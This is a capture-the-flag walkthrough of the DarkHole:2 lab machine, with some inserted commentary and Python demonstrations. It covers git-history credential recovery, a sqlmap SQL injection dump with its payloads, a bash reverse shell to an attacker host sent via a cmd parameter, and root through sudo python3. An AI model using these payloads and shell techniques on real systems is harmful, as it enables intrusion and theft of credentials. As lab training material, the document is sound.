DarkHole:2 - WriteUp

Hi! Today we'll be solving the DarkHole-2 machine from Vulnhub. Let's begin...

Enumeration

First, a full port scan with nmap, with service and script detection on whatever is open:

❯ nmap -sS --min-rate 5000 -sCV --open -n -Pn -p- -oN Ports 192.168.1.83
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2023-01-24 19:01 CET
Nmap scan report for 192.168.1.83
Host is up (0.0011s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 57:b1:f5:64:28:98:91:51:6d:70:76:6e:a5:52:43:5d (RSA)
|   256 cc:64:fd:7c:d8:5e:48:8a:28:98:91:b9:e4:1e:6d:a8 (ECDSA)
|_  256 9e:77:08:a4:52:9f:33:8d:96:19:ba:75:71:27:bd:60 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-git: 
|   192.168.1.83:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: i changed login.php file for more secure 
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: DarkHole V2
MAC Address: 00:0C:29:BA:C3:82 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.06 seconds

Only two ports are open:

  • 22 -> SSH
  • 80 -> HTTP

Port 80 serves a login panel for which we have no credentials. The nmap output, however, already gives us something better to work with: the http-git script found a /.git/ directory exposed under the web root, and the last commit message ("i changed login.php file for more secure") suggests the login code had a problem worth looking at.

Let's download the directory recursively so we can inspect it locally. This works here because Apache has directory listing enabled for /.git/; when listing is disabled, a tool such as git-dumper, which reconstructs the repository from its known layout (HEAD, index, refs, objects), is the usual alternative.

❯ wget --recursive 192.168.1.83:80/.git/

This is what we got:

ls -la
drwxr-xr-x xxx xxx  66 B  Tue Jan 24 19:10:44 2023  .
drwxr-xr-x xxx xxx  40 B  Tue Jan 24 19:10:44 2023  ..
drwxr-xr-x xxx xxx 436 B  Tue Jan 24 19:10:44 2023  .git
drwxr-xr-x xxx xxx  76 B  Tue Jan 24 19:10:44 2023  icons
drwxr-xr-x xxx xxx  70 B  Tue Jan 24 19:10:45 2023  style
.rw-r--r-- xxx xxx 740 B  Tue Jan 24 19:10:44 2023  index.html
.rw-r--r-- xxx xxx 1.0 KB Tue Jan 24 19:10:44 2023  login.php

Now we'll use git itself to go through the commits made during the development of what appears to be a web application:

❯ git log
commit 0f1d821f48a9cf662f285457a5ce9af6b9feb2c4 (HEAD -> master)
Author: Jehad Alqurashi <anmar-v7@hotmail.com>
Date:   Mon Aug 30 13:14:32 2021 +0300

    i changed login.php file for more secure

commit a4d900a8d85e8938d3601f3cef113ee293028e10
Author: Jehad Alqurashi <anmar-v7@hotmail.com>
Date:   Mon Aug 30 13:06:20 2021 +0300

    I added login.php file with default credentials

commit aa2a5f3aa15bb402f2b90a07d86af57436d64917
Author: Jehad Alqurashi <anmar-v7@hotmail.com>
Date:   Mon Aug 30 13:02:44 2021 +0300

    First Initialize

Commit a4d900a8d85e8938d3601f3cef113ee293028e10 added default credentials to login.php. The following commit claims to have made the file "more secure", but whatever it changed, the earlier version of the file is still in the repository's history. Let's use git to show that commit:

❯ git show a4d900a
commit a4d900a8d85e8938d3601f3cef113ee293028e10
Author: Jehad Alqurashi <anmar-v7@hotmail.com>
Date:   Mon Aug 30 13:06:20 2021 +0300

    I added login.php file with default credentials

diff --git a/login.php b/login.php
index e69de29..8a0ff67 100644
--- a/login.php
+++ b/login.php
@@ -0,0 +1,42 @@
+<?php
+session_start();
+require 'config/config.php';
+if($_SERVER['REQUEST_METHOD'] == 'POST'){
+    if($_POST['email'] == "lush@admin.com" && $_POST['password'] == "321"){
+        $_SESSION['userid'] = 1;
+        header("location:dashboard.php");
+        die();
+    }
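Review bot: the check on the `if($_POST['email'] == "lush@admin.com" && $_POST['password'] == "321")` line hardcodes a plaintext email and password into login.php, so anyone who can read the source (here, the whole .git/ directory is served by the web root) has a working login, and rewriting the file in a later commit leaves this version recoverable from history. Compare against a stored hash with password_verify() and keep the account record out of the repository; also, $_POST['email'] and $_POST['password'] are read without isset(), and PHP's loose == on user-supplied strings is better replaced with === or hash_equals().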

The diff shows an email and a password in plaintext; the fact that HEAD no longer contains them is irrelevant, because every earlier revision is still in the repository:

  • lush@admin.com:321
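To make that point concrete, here is an added example (not from the writeup): a small Python script that builds a throwaway repository with two commits, the first hardcoding a password in login.php and the second removing it, and then recovers the secret by walking HEAD, the branch ref and the loose objects by hand, the way git log and git show do. Everything in it (the paths, the PHP fragments, the password "s3cret" and the author) is constructed for the example. It uses no git binary, which also shows that a dumped .git/ directory is readable without one.

```python
import hashlib
import os
import re
import tempfile
import zlib


def write_object(git_dir, kind, data):
    """Store a loose object ("<kind> <size>\\0<data>", zlib-compressed); return its SHA-1."""
    raw = b"%s %d\0" % (kind.encode(), len(data)) + data
    sha = hashlib.sha1(raw).hexdigest()
    path = os.path.join(git_dir, "objects", sha[:2], sha[2:])
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(zlib.compress(raw))
    return sha


def read_object(git_dir, sha):
    """Inflate a loose object and return (kind, payload)."""
    path = os.path.join(git_dir, "objects", sha[:2], sha[2:])
    with open(path, "rb") as fh:
        raw = zlib.decompress(fh.read())
    header, payload = raw.split(b"\0", 1)
    return header.split(b" ")[0].decode(), payload


def write_commit(git_dir, files, message, parent=None):
    """Write blobs, one flat tree and a commit for {filename: bytes}; return the commit SHA-1."""
    entries = b""
    for name, content in sorted(files.items()):
        blob = write_object(git_dir, "blob", content)
        entries += b"100644 %s\0%s" % (name.encode(), bytes.fromhex(blob))
    tree = write_object(git_dir, "tree", entries)
    body = b"tree %s\n" % tree.encode()
    if parent:
        body += b"parent %s\n" % parent.encode()
    body += b"author Dev <dev@example.com> 1630318000 +0300\n"
    body += b"committer Dev <dev@example.com> 1630318000 +0300\n\n"
    return write_object(git_dir, "commit", body + message.encode() + b"\n")


def parse_tree(data):
    """Yield (mode, name, sha) for each "<mode> <name>\\0<20 raw sha bytes>" entry."""
    pos = 0
    while pos < len(data):
        nul = data.index(b"\0", pos)
        mode, name = data[pos:nul].split(b" ", 1)
        yield mode.decode(), name.decode(), data[nul + 1:nul + 21].hex()
        pos = nul + 21


def walk_history(git_dir, pattern):
    """HEAD -> ref -> commit -> parent chain, grepping every blob of every tree.

    Manual equivalent of `git log` plus `git show`; returns
    [(commit_sha, message, filename, match), ...] newest first.
    """
    with open(os.path.join(git_dir, "HEAD")) as fh:
        ref = fh.read().strip().split("ref: ", 1)[1]
    with open(os.path.join(git_dir, ref)) as fh:
        sha = fh.read().strip()
    regex, hits = re.compile(pattern), []
    while sha:
        _, commit = read_object(git_dir, sha)
        headers, message = commit.split(b"\n\n", 1)
        fields = dict(line.split(b" ", 1) for line in headers.split(b"\n"))
        _, tree = read_object(git_dir, fields[b"tree"].decode())
        for _, name, blob_sha in parse_tree(tree):
            _, blob = read_object(git_dir, blob_sha)
            for m in regex.finditer(blob.decode(errors="replace")):
                hits.append((sha, message.decode().strip(), name, m.group(0)))
        sha = fields.get(b"parent", b"").decode()  # empty at the root commit
    return hits


def demo():
    """Two constructed commits: one hardcodes a password, the next removes it.

    HEAD holds the "fixed" file, yet the secret comes back from the parent commit.
    """
    git_dir = os.path.join(tempfile.mkdtemp(), ".git")
    os.makedirs(os.path.join(git_dir, "refs", "heads"))
    leaky = b"<?php if($_POST['password'] == \"s3cret\"){ $_SESSION['userid'] = 1; }\n"
    fixed = b"<?php if(password_verify($_POST['password'], $row['hash'])){ $_SESSION['userid'] = 1; }\n"
    c1 = write_commit(git_dir, {"login.php": leaky}, "added login.php with default credentials")
    c2 = write_commit(git_dir, {"login.php": fixed}, "changed login.php to be more secure", parent=c1)
    with open(os.path.join(git_dir, "HEAD"), "w") as fh:
        fh.write("ref: refs/heads/master\n")
    with open(os.path.join(git_dir, "refs", "heads", "master"), "w") as fh:
        fh.write(c2 + "\n")
    return walk_history(git_dir, r"== \"[^\"]+\"")


if __name__ == "__main__":
    for commit, msg, name, match in demo():
        print(f"{commit[:7]} {msg!r}: {name} contains {match}")
```

Run it and the only hit comes from the first commit, exactly as git show did on the target: the "more secure" rewrite changed the working tree, not the history. Real repositories also use packfiles (objects/pack/*.pack), which this loose-object walker does not read; on a dumped repository, running git on the downloaded directory handles both.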

Exploitation

Logging in with these credentials gets us into the web application, where we can update our profile data. The URL carries an id parameter (dashboard.php?id=1) which turns out to be injectable: as the sqlmap output below shows, it is exploitable through a UNION query and a time-based blind injection (sqlmap does not report an error-based one).
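As an added example (not the writeup's code, and not the target's PHP, which the page never shows), the following Python reproduces the technique sqlmap applied, against an in-memory SQLite stand-in with the same table names as the dump. dashboard_vulnerable mimics the assumed splicing of id into the query; count_columns recovers the column count by ORDER BY probing (the step behind sqlmap's "6 columns"); union_payload builds a UNION ALL with the same shape as sqlmap's payload to read the ssh table through the users query; dashboard_fixed shows the parameterised version returning nothing for the same input. The rows are made up.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the two tables seen in the dump.

    Table and column names follow darkhole_2 (users, ssh); the values are
    invented for the example and are not the target's data.
    """
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE users(id INTEGER, email TEXT, username TEXT);
        CREATE TABLE ssh(id INTEGER, user TEXT, pass TEXT);
        INSERT INTO users VALUES (1, 'admin@example.com', 'Example Admin');
        INSERT INTO ssh VALUES (1, 'example_user', 'example_pass');
        """
    )
    return db


def dashboard_vulnerable(db, user_id):
    """Assumed pattern behind dashboard.php?id=...: the value is spliced into the
    SQL string, so a single quote closes the literal and the rest becomes SQL."""
    sql = "SELECT id, email, username FROM users WHERE id='%s'" % user_id
    return db.execute(sql).fetchall()


def dashboard_fixed(db, user_id):
    """Parameterised version: the driver binds the value, so the whole payload is
    compared as one opaque id and no row matches."""
    sql = "SELECT id, email, username FROM users WHERE id=?"
    return db.execute(sql, (user_id,)).fetchall()


def count_columns(db, max_cols=16):
    """Recover the column count of the original SELECT by probing ORDER BY n;
    the first n that raises an error is one past the count."""
    for n in range(1, max_cols + 1):
        try:
            dashboard_vulnerable(db, "1' ORDER BY %d-- -" % n)
        except sqlite3.OperationalError:
            return n - 1
    return None


def union_payload(columns):
    """Build a UNION ALL payload shaped like sqlmap's: a negative id that matches
    no row, then a SELECT with exactly `columns` columns pulling user and pass
    from the ssh table out through the users query. Needs columns >= 3."""
    cols = ["NULL"] * columns
    cols[0], cols[1], cols[2] = "id", "user", "pass"
    return "-1' UNION ALL SELECT %s FROM ssh-- -" % ", ".join(cols)


if __name__ == "__main__":
    db = make_db()
    n = count_columns(db)
    print("columns in the original SELECT:", n)
    print("vulnerable:", dashboard_vulnerable(db, union_payload(n)))
    print("fixed:     ", dashboard_fixed(db, union_payload(n)))
```

The vulnerable path returns the ssh row in place of a profile, which is the same effect as sqlmap's "-8315' UNION ALL SELECT NULL,...-- -" payload above with six columns; the parameterised path returns an empty list for the identical string. Time-based blind injection (SLEEP) is MySQL-specific and is not reproduced in the SQLite stand-in.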

We'll use sqlmap to extract the database contents. The PHPSESSID cookie is required because dashboard.php is only reachable with a logged-in session. The run below resumes from a stored session, so the injection points had already been confirmed and the darkhole_2 database identified in an earlier run; here it is dumped directly with -D darkhole_2 --dump:

❯ sqlmap -u "http://192.168.1.83/dashboard.php?id=1" --cookie "PHPSESSID=m4p16840eqi6g1alsg4phhbi6m" -D darkhole_2 --dump
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.3#stable}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:28:03 /2023-01-24/

[19:28:04] [INFO] resuming back-end DBMS 'mysql' 
[19:28:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1888 FROM (SELECT(SLEEP(5)))CTUu) AND 'LLdB'='LLdB

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=-8315' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178626a71,0x566363776d5573774f7a77506458427547515a41465456786f6c6643454a524f696f426a72564775,0x717a7a7a71),NULL-- -
---
[19:28:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.04 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[19:28:04] [INFO] fetching tables for database: 'darkhole_2'
[19:28:04] [INFO] fetching columns for table 'ssh' in database 'darkhole_2'
[19:28:04] [INFO] fetching entries for table 'ssh' in database 'darkhole_2'
Database: darkhole_2
Table: ssh
[1 entry]
+----+------+--------+
| id | pass | user   |
+----+------+--------+
| 1  | fool | jehad  |
+----+------+--------+

[19:28:04] [INFO] table 'darkhole_2.ssh' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.1.83/dump/darkhole_2/ssh.csv'
[19:28:04] [INFO] fetching columns for table 'users' in database 'darkhole_2'
[19:28:04] [INFO] fetching entries for table 'users' in database 'darkhole_2'
Database: darkhole_2
Table: users
[1 entry]
+----+----------------+---------------+----------+-----------------------------+----------------+
| id | email          | address       | password | username                    | contact_number |
+----+----------------+---------------+----------+-----------------------------+----------------+
| 1  | lush@admin.com | <h1>test</h1> | 321      | Jehad Alqurashiasddasdasdas | 1111111111     |
+----+----------------+---------------+----------+-----------------------------+----------------+

[19:28:04] [INFO] table 'darkhole_2.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.1.83/dump/darkhole_2/users.csv'
[19:28:04] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.83'
[19:28:04] [WARNING] your sqlmap version is outdated

[*] ending @ 19:28:04 /2023-01-24/

We have extracted a username and a plaintext password from the ssh table of the darkhole_2 database:

  • jehad:fool

Privesc

These credentials work over SSH:

❯ ssh jehad@192.168.1.83
jehad@192.168.1.83's password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-81-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 24 Jan 2023 06:30:22 PM UTC

  System load:  0.03               Processes:              234
  Usage of /:   52.3% of 12.73GB   Users logged in:        0
  Memory usage: 21%                IPv4 address for ens33: 192.168.1.83
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

249 updates can be applied immediately.
180 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

New release '22.04.1 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


Last login: Tue Jan 24 17:13:33 2023 from 192.168.1.42
jehad@darkhole:~$ id
uid=1001(jehad) gid=1001(jehad) groups=1001(jehad)
jehad@darkhole:~$

Enumerating this user's bash history, we see web requests to a local port, 9999, passing a command through the GET parameter cmd:

jehad@darkhole:~$ head .bash_history 
clear
ls -la
cat id_rsa
clear
netstat -tulpn | grep LISTEN
ssh -L 127.0.0.1:9999:192.168.135.129:9999 jehad@192.168.135.129
curl http://localhost:9999
curl "http://localhost:999/?cmd=id" 
curl "http://localhost:9999/?cmd=id" 
curl http://localhost:9999/

Repeating one of those requests shows that the commands are executed as another system user, losy:

jehad@darkhole:~$ curl "http://127.0.0.1:9999/?cmd=id"
Parameter GET['cmd']uid=1002(losy) gid=1002(losy) groups=1002(losy)
uid=1002(losy) gid=1002(losy) groups=1002(losy)

Let's use this to get a shell as that user. First, a netcat listener on port 443 on our attacking machine:

❯ nc -lvvp 443
listening on [any] 443 ...

Then, from the victim, we send a bash reverse shell through the cmd parameter. The payload goes through --data-urlencode because it contains characters such as the & in ">&", spaces and slashes that would otherwise be interpreted as part of the query string rather than as the command:

jehad@darkhole:~$ curl -G http://127.0.0.1:9999/ --data-urlencode "cmd= bash -c 'bash -i >& /dev/tcp/192.168.1.42/443 0>&1'"

Our listener receives the connection and we have a shell as losy:

❯ nc -lvvp 443
listening on [any] 443 ...
192.168.1.83: inverse host lookup failed: Unknown host
connect to [192.168.1.42] from (UNKNOWN) [192.168.1.83] 37822
bash: cannot set terminal process group (1165): Inappropriate ioctl for device
bash: no job control in this shell
losy@darkhole:/opt/web$ id
id
uid=1002(losy) gid=1002(losy) groups=1002(losy)
losy@darkhole:/opt/web$

Now we can read the user flag. Continuing enumeration as before, this user's command history also contains something useful:

losy@darkhole:~$ cat .bash_history
cd .ssh/
chmod 666 id_rsa
php -S localhost:9999
clear
sudo su
su lama
clear
ls -la
cat /etc/crontab
su lama
mkdir web
ls -la
su lama
ls
touch index.php
cd ..
ls
ls -la
sudo su
c
clear
su lama
clear
su lama
mysql -e '\! /bin/bash'
mysql -u root -p -e '\! /bin/bash'
P0assw0rd losy:gang

The history explains the service on port 9999 (losy started PHP's built-in server with php -S localhost:9999 from the web directory, which is why our shell landed in /opt/web) and, more usefully, its last line contains what looks like credentials typed into the terminal by mistake. The losy:gang part corresponds to our current user:

  • losy:gang

With that password we can check our sudo privileges, which allow running python3 as root:

losy@darkhole:~$ sudo -l
[sudo] password for losy: 
Matching Defaults entries for losy on darkhole:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User losy may run the following commands on darkhole:
    (root) /usr/bin/python3

Escalating to root is then straightforward: allowing a user to run an interpreter as root is equivalent to granting them root, since importing the os module from the privileged interpreter lets us execute any system command.

losy@darkhole:~$ sudo python3
Python 3.8.10 (default, Jun  2 2021, 10:49:15) 
[GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.system('bash')
root@darkhole:/home/losy#